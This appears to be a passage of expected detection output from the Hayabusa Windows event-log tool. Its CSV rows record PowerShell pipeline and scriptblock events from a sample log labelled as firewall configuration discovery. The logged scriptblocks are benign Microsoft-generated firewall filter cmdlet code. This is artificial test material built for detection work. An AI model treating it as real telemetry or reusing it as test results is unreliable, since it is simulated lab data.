+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetServiceFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallServiceFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""ServiceName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Service"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByService"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ServiceName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Service""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 